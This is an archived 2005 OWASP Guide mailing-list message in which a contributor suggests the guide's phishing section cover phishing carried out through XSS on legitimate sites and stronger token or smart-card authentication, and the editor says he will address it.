[OWASP-GUIDE] Phishing section in the guide: no XSS or secure auth?
Andrew van der Stock
vanderaj at greebo.net
Mon Sep 12 09:28:04 EDT 2005
Comment inserted into the latest chapter - I will deal with it shortly.
On 03/08/2005, at 8:45 PM, Javier Fernandez-Sanguino wrote:
> Just a question that poped to my mind when skimming through the
> phishing section in the Guide:
> - There is no mention on the issues related to phishing scams and
> XSS attacks. While as a phishing web server can be taken off by
> authorities it is much harder to do so if a phisher users
> _your_site_ (through XSS) flaws to organise a phishing scam. Not
> only the fix is more comlex ("have to fix the application! now!")
> but also makes other recommendations about phishing worthless
> ("make sure you are in a secure site? Check. Web site belongs to
> the bank? Check. SSL in use? Check....")
> - (This might be controversial) There is no mention on replacing
> the aged user/password login process with secure authentication (be
> it token or smart cards). Granted, secure authentication does not
> drive phishing attacks away but it does shift them to be "steal
> password" to "steal session" (or MITM attacks) and if you are using
> secure authentication for the "operation" key (not the "access"
> key) i.e. the one that is not associated with the session, you
> force phishers to shift tactics. (They will probably shift tactis
> to trojan systems from remote users, however)
> Just a few cents to spark some discussion. Andrew, if you want to,
> I can write some paragraphs about this for that section.
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Owasp-guide